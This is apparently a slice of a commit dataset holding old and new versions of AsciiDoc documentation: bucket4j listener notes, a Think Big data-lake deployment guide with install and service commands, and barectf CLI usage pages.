What do I need to do if I need an aggregated stat across the whole cluster?\n\n**Answer:** Because of a planned expansion to non-JVM back-ends such as Redis, MySQL, PostgreSQL.\nIt is not possible to serialize and invoke the listener on these non-Java back-ends, so it was decided to invoke the listener on the client-side,\nto avoid inconsistency between different back-ends in the future.\nYou can do post-aggregation of monitoring statistics via features built into your monitoring database or via a mediator (like StatsD) between your application and the monitoring database.\n========\n\n==== How to attach a listener to a bucket?\nThe bucket can be decorated with a listener via the ``toListenable`` method.\n[source, java]\n----\nBucketListener listener = new MyListener();\n\nBucket bucket = Bucket.builder()\n .addLimit(Bandwidth.simple(100, Duration.ofMinutes(1)))\n .build()\n .toListenable(listener);\n----\n\n==== Example of integration with Dropwizard metrics-core\n`io.github.bucket4j.SimpleBucketListener` is a simple implementation of the `io.github.bucket4j.BucketListener` interface that is available out of the box. Below is an example of exposing statistics via Dropwizard Metrics (for Micrometer it should be quite similar):\n[source, java]\n----\npublic static Bucket decorateBucketByStatListener(Bucket originalBucket, String bucketName, MetricRegistry registry) {\n SimpleBucketListener stat = new SimpleBucketListener();\n registry.register(bucketName + \".consumed\", (Gauge<Long>) stat::getConsumed);\n registry.register(bucketName + \".rejected\", (Gauge<Long>) stat::getRejected);\n registry.register(bucketName + \".parkedNanos\", (Gauge<Long>) stat::getParkedNanos);\n registry.register(bucketName + \".interrupted\", (Gauge<Long>) stat::getInterrupted);\n registry.register(bucketName + \".delayedNanos\", (Gauge<Long>) stat::getDelayedNanos);\n\n return originalBucket.toListenable(stat);\n}\n----\n","old_contents":"[[listener]]\n=== Listening for bucket events\n\n==== What can be listened\n.You can decorate the bucket by listener in order to track following events:\n- When tokens are consumed from a bucket.\n- When consumption requests were rejected by the bucket.\n- When thread was parked to wait for tokens refill as a result of interaction with ``BlockingBucket``.\n- When thread was interrupted during the wait for tokens to be refilled as a result of interaction with ``BlockingBucket``.\n- When a delayed task was submitted to ``ScheduledExecutorService`` as a result of interaction with ``AsyncScheduledBucket``.\n\n==== Listener API - corner cases\n========\n**Question:** How many listeners are needed to create an application that uses many buckets?\n\n**Answer:** it depends:\n\n- If you want to have aggregated statistics for all buckets then create a single listener per application and reuse this listener for all buckets.\n- If you want to measure statistics independently per each bucket then use a listener per bucket model.\n========\n\n========\n**Question:** where are methods the listener is invoking in case of distributed usage?\n\n**Answer:** listener always invoked on client side, it means that each client JVM will have its own totally independent stat for the same bucket.\n========\n\n========\n**Question:** Why does bucket invoke the listener on client side instead of server side in case of distributed scenario? 
What do I need to do if I need an aggregated stat across the whole cluster?\n\n**Answer:** Because of planned expansion to non-JVM back-ends such as Redis, MySQL, PostgreSQL.\nIt is not possible to serialize and invoke listener on this non-java back-ends, so it was decided to invoke listener on client side,\nin order to avoid inconsistency between different back-ends in the future.\nYou can do post-aggregation of monitoring statistics via features built-into your monitoring database or via mediator(like StatsD) between your application and monitoring database.\n========\n\n==== How to attach a listener to a bucket?\nThe bucket can be decorated by the listener via the ``toListenable`` method.\n[source, java]\n----\nBucketListener listener = new MyListener();\n\nBucket bucket = Bucket.builder()\n .addLimit(Bandwidth.simple(100, Duration.ofMinutes(1)))\n .build()\n .toListenable(listener);\n----\n\n==== Example of integration with Dropwizard metrics-core\n`io.github.bucket4j.SimpleBucketListener` is a simple implementation of `io.github.bucket4j.BucketListener` interface that is available out of the box. Below the example of exposing statistics via Dropwizard Metrics(for Micrometer it should be quite similar):\n[source, java]\n----\npublic static Bucket decorateBucketByStatListener(Bucket originalBucket, String bucketName, MetricRegistry registry) {\n SimpleBucketListener stat = new SimpleBucketListener();\n registry.register(name + \".consumed\", (Gauge<Long>) stat::getConsumed);\n registry.register(name + \".rejected\", (Gauge<Long>) stat::getRejected);\n registry.register(name + \".parkedNanos\", (Gauge<Long>) stat::getParkedNanos);\n registry.register(name + \".interrupted\", (Gauge<Long>) stat::getInterrupted);\n registry.register(name + \".delayedNanos\", (Gauge<Long>) stat::getDelayedNanos);\n\n return originalBucket.toListenable(stat);\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa38dd1024a52c61f4638ef4eaf5f267c7285515","subject":"more changes to deployment guide","message":"more changes to deployment guide\n","repos":"rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo,rashidaligee\/kylo","old_file":"docs\/latest\/deployment-guide.adoc","new_file":"docs\/latest\/deployment-guide.adoc","new_contents":"= Data Lake Accelerator Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the Data Lake Accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. 
The following should be available prior to installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on one edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing to a Hortonworks sandbox.\n\n\n. Log in to the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place it on the host Linux machine. You can right-click the download link and copy the URL to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run the RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTIP: See the section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes.\n\n\n1. For each step, log in to the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place it on the host Linux machine you want to install the data lake accelerator services on. You can right-click the download link and copy the URL to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run the data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see the database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing Elasticsearch installation or follow the steps in the Elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n NOTE: If installing on a different node than NiFi and thinkbig-services, you will need to update the following properties\n\n \/opt\/nifi\/ext-config\/config.properties\n\n * spring.activemq.broker-url\n\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n * jms.activemq.broker.url\n\n\n7. Install NiFi\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. 
Install the Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services is located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== MySQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory settings of the services using the THINKBIG_UI_OPTS and THINKBIG_SERVICES_OPTS environment variables. \n\n export THINKBIG_UI_OPTS=-Xmx4g\n export THINKBIG_SERVICES_OPTS=-Xmx4g\n \nThe settings above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: The components below are installed as services and should start and stop automatically when the machine is rebooted.\n\nFor starting and stopping the 3 data lake accelerator services you can run the following scripts:\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above is configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. 
Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URLs and ports for the services:\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Cleanup script\nFor development and sandbox environments, you can leverage the cleanup script to remove all of the Think Big services as well as Elasticsearch,\nActiveMQ, and NiFi.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanup-env.sh\n\n IMPORTANT Only run this in a DEV environment. This will delete all applications and the MySQL schema\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","old_contents":"= Data Lake Accelerator Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the data lake accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on 1 edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing to a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTIP: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. 
Find and download the RPM file from artifactory and place it on the host Linux machine where you want to install the data lake accelerator services. You can right-click the download link and copy the URL to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing Elasticsearch installation or follow the steps in the Elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n NOTE: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n \/opt\/nifi\/ext-config\/config.properties\n\n spring.activemq.broker-url\n\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n jms.activemq.broker.url\n\n\n7. Install NiFi\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services is located in the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== MySQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Creates the tables used by the data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory settings of the Think Big UI and services applications using the THINKBIG_UI_OPTS and THINKBIG_SERVICES_OPTS environment variables.\n\n export THINKBIG_UI_OPTS=-Xmx4g\n export THINKBIG_SERVICES_OPTS=-Xmx4g\n \nThe settings above set the Java maximum heap size to 4 GB. 
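\nIf you change these values, restart the affected applications so the new heap size takes effect. A minimal sketch, assuming the init scripts accept the stop and start subcommands listed in the next section:\n\n # assumption: init scripts support the stop\/start subcommands shown below\n $ export THINKBIG_UI_OPTS=-Xmx4g\n $ export THINKBIG_SERVICES_OPTS=-Xmx4g\n $ service thinkbig-ui stop && service thinkbig-ui start\n $ service thinkbig-services stop && service thinkbig-services start\n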
\n\n\n== Starting the Services\nNote: The components below are installed as services and start and stop automatically when the machine is rebooted.\n\nTo start and stop the 3 data lake accelerator services, you can run the following scripts:\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above is configured in:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nBy default, each application writes its logs under:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URLs and ports for the services:\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a29f21a7826530f608b4589fbf5ff5b3ecf2dde","subject":"docs: cli: usage.adoc: improve page","message":"docs: cli: usage.adoc: improve page\n\nChanges:\n\n* Add link to <https:\/\/git-scm.com\/>.\n\n* Use the third person for the command descriptions in the\n General description section.\n\n* Add and fix many internal links.\n\n* Specify that `PREFIX` must be a valid C identifier.\n\nSigned-off-by: Philippe Proulx <2096628897b40c93960fdd9e24c9c883a54d4fe9@gmail.com>\n","repos":"efficios\/barectf,efficios\/barectf","old_file":"docs\/modules\/cli\/pages\/usage.adoc","new_file":"docs\/modules\/cli\/pages\/usage.adoc","new_contents":"= `barectf` CLI tool usage\n\nbarectf ships with the `barectf` command-line interface (CLI) tool.\n\n== General synopses\n\nRun a `barectf` command:\n\n[.cl]\n[verse]\n*barectf* _COMMAND_ _COMMAND-ARGUMENTS_\n\nPrint the version of `barectf`:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#version-option[--version]pass:[\\]]\n\nPrint brief general help:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#help-option[--help]pass:[\\]]\n\n== General description\n\nThe `barectf` tool offers a https:\/\/git-scm.com\/[Git]-like\nuser interface with the following available commands:\n\n<<generate-command,`generate`>>::\n Generates the C{nbsp}source and CTF metadata stream files of a\n tracer from a xref:yaml:index.adoc[YAML configuration file].\n\n<<show-effective-configuration-command,`show-effective-configuration`>>::\n Prints the xref:yaml:index.adoc#stages[_effective_] 
version of\n a YAML configuration file.\n\n<<show-configuration-version-command,`show-configuration-version`>>::\n Prints the major version (2 or 3) of a YAML configuration file.\n\n== General options\n\n[[help-option]]`-h`::\n`--help`::\n Print brief general help and exit.\n\n[[version-option]]`-V`::\n`--version`::\n Print the version of `barectf` and exit.\n\n[[generate-command]]\n== `generate` command\n\n=== Synopses\n\nGenerate files from a xref:yaml:index.adoc[YAML configuration file]:\n\n[.cl]\n[verse]\n*barectf generate* pass:[[]xref:#generate-prefix-option[--prefix]=__PREFIX__] pass:[[]xref:#generate-metadata-dir-option[--metadata-dir]=__MDIR__]\n pass:[[]xref:#generate-headers-dir-option[--headers-dir]=__HDIR__] pass:[[]xref:#generate-code-dir-option[--code-dir]=__CDIR__]\n pass:[[]xref:#generate-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#generate-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf generate* xref:#generate-help-option[--help]\n\n=== Command name aliases\n\n* `gen`\n\n=== Description\n\nThe `barectf generate` command reads the xref:yaml:index.adoc[YAML\nconfiguration file] `__CONFIG-PATH__` to produce:\n\n[%autowidth.stretch, cols=\"d,a\"]\n|===\n|File name |Description\n\n|`__MDIR__\/metadata`\n|The CTF metadata stream file.\n\n|`__HDIR__\/__FPREFIX__.h`\n|The generated tracer's public C{nbsp}header file.\n\n|`__HDIR__\/__FPREFIX__-bitfield.h`\n|Internal macros for the generated tracer (included by `__FPREFIX__.c`).\n\n|`__CDIR__\/__FPREFIX__.c`\n|The generated tracer's C{nbsp}source code.\n|===\n\nSee xref:lel[Build the generated C{nbsp}source code] to learn how to\nbuild the C{nbsp}source which the `generate` command produces.\n\nIn the list above, `__FPREFIX__` is:\n\nWithout the <<generate-prefix-option,`--prefix`>> option::\n If the `__CONFIG-PATH__` file has a file name xref:yaml:cfg-obj.adoc#prefix-prop[prefix option]:::\n The `__CONFIG-PATH__` file's file name prefix option.\n Otherwise:::\n `barectf`\n\nWith the <<generate-prefix-option,`--prefix`>> option::\n `__PREFIX__`, without trailing underscores.\n+\nFor example, if `__PREFIX__` is `my_tracer_`, then `__FPREFIX__` is\n`my_tracer`.\n\nBy default, `__MDIR__`, `__HDIR__`, and `__CDIR__` are the current\nworking directory. Use the\n<<generate-metadata-dir-option,`--metadata-dir`>>,\n<<generate-headers-dir-option,`--headers-dir`>>, and\n<<generate-code-dir-option,`--code-dir`>> to specify other output\ndirectories.\n\nTherefore, by default, the `generate` command writes the `metadata`,\n`barectf.h`, `barectf-bitfield.h`, and `barectf.c` files to the current\nworking directory.\n\nIf you use the <<prefix-option,`--prefix`>> option, then all the\npublic C{nbsp}identifiers in `__FPREFIX__.h` and `__FPREFIX__.c` begin\nwith `__PREFIX__`. Otherwise, they begin with:\n\nIf the `__CONFIG-PATH__` file has an identifier xref:yaml:cfg-obj.adoc#prefix-prop[prefix option]::\n The `__CONFIG-PATH__` file's identifier prefix option.\n\nOtherwise::\n `barectf_`\n\nAdd directories to be searched into for xref:yaml:include.adoc[inclusion\nfiles] before the default inclusion directories with the repeatable\n<<generate-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. 
Force\n`barectf generate` to continue silently instead with its\n<<generate-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[generate-code-dir-option]]`-c __CDIR__`::\n`--code-dir=__CDIR__`::\n Write the C{nbsp}source file to the directory `__CDIR__` instead of\n the current working directory.\n\n[[generate-headers-dir-option]]`-H __HDIR__`::\n`--headers-dir=__HDIR__`::\n Write C{nbsp}header files to the directory `__HDIR__` instead of\n the current working directory.\n\n[[generate-help-option]]`-h`::\n`--help`::\n Print the `generate` command's brief help and exit.\n\n[[generate-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[generate-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the\n xref:yaml:include.adoc#std[standard partial YAML files]\n (like `stdint.yaml`).\n\n[[generate-metadata-dir-option]]`-m __MDIR__`::\n`--metadata-dir=__MDIR__`::\n Write the CTF metadata stream file to the directory `__MDIR__`\n instead of the current working directory.\n\n[[generate-prefix-option]]`-p __PREFIX__`::\n`--prefix=__PREFIX__`::\n Override the default or `__CONFIG-PATH__` file's file and\n identifier prefixes with:\n+\nFile name prefix:::\n `__PREFIX__`, without trailing underscores.\nIdentifier prefix:::\n `__PREFIX__`\n\n+\n--\n`__PREFIX__` must be a valid C{nbsp}identifier.\n\nThe default file name prefix is `barectf`.\n\nThe default identifier prefix is `barectf_`.\n--\n\n[[show-effective-configuration-command]]\n== `show-effective-configuration` command\n\n=== Synopses\n\nShow the xref:yaml:index.adoc#stages[effective] version of a\nxref:yaml:index.adoc[YAML configuration file]:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* pass:[[]xref:#show-effective-configuration-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#show-effective-configuration-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* xref:#show-effective-configuration-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-effective-config`\n* `show-effective-cfg`\n\n=== Description\n\nThe `barectf show-effective-configuration` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints an equivalent, _effective_ YAML configuration.\n\nSee the xref:yaml:index.adoc#stages[processing stages] of a YAML\nconfiguration file to learn what an effective configuration is.\n\nMoreover, the `show-effective-configuration` command validates the\n`__CONFIG-PATH__` file. In other words, if the command\n<<exit-status,exits>> with status{nbsp}0, the\n<<generate-command,`generate` command>> using the same options and\n`__CONFIG-PATH__` file would also succeed.\n\nAdd directories to be searched into for inclusion files before the\ndefault inclusion directories with the repeatable\n<<show-effective-configuration-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. 
Force\n`barectf show-effective-configuration` to continue silently instead\nwith its\n<<show-effective-configuration-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[show-effective-configuration-help-option]]`-h`::\n`--help`::\n Print the `show-effective-configuration` command's\n brief help and exit.\n\n[[show-effective-configuration-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[show-effective-configuration-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the\n xref:yaml:include.adoc#std[standard partial YAML files]\n (like `stdint.yaml`).\n\n[[show-configuration-version-command]]\n== `show-configuration-version` command\n\n=== Synopses\n\nShow a xref:yaml:index.adoc[YAML configuration file]'s version:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* xref:#show-configuration-version-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-config-version`\n* `show-cfg-version`\n\n=== Description\n\nThe `barectf show-configuration-version` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints its version, which is either 2 or 3.\n\nThe `show-configuration-version` does _not_ validate the\n`__CONFIG-PATH__` file like the\n<<show-effective-configuration-command,`show-effective-configuration`\ncommand>> does.\n\n=== Options\n\n[[show-configuration-version-help-option]]`-h`::\n`--help`::\n Print the `show-configuration-version` command's brief help\n and exit.\n\n[[exit-status]]\n== Exit status\n\n0::\n Success\n\nNot 0::\n Error\n","old_contents":"= `barectf` CLI tool usage\n\nbarectf ships with the `barectf` command-line interface (CLI) tool.\n\n== General synopses\n\nRun a `barectf` command:\n\n[.cl]\n[verse]\n*barectf* _COMMAND_ _COMMAND-ARGUMENTS_\n\nPrint the version of `barectf`:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#version-option[--version]pass:[\\]]\n\nPrint brief general help:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#help-option[--help]pass:[\\]]\n\n== General description\n\nThe `barectf` tool has a Git-like user interface with the following\navailable commands:\n\n<<generate-command,`generate`>>::\n Generate the C source and CTF metadata stream files of a tracer\n from a xref:yaml:index.adoc[YAML configuration file].\n\n<<show-effective-configuration-command,`show-effective-configuration`>>::\n Print the _effective_ YAML configuration file for a given YAML\n configuration file and inclusion directories.\n\n<<show-configuration-version-command,`show-configuration-version`>>::\n Print the major version (2 or 3) of a YAML configuration file.\n\n== General options\n\n[[help-option]]`-h`::\n`--help`::\n Print brief general help and 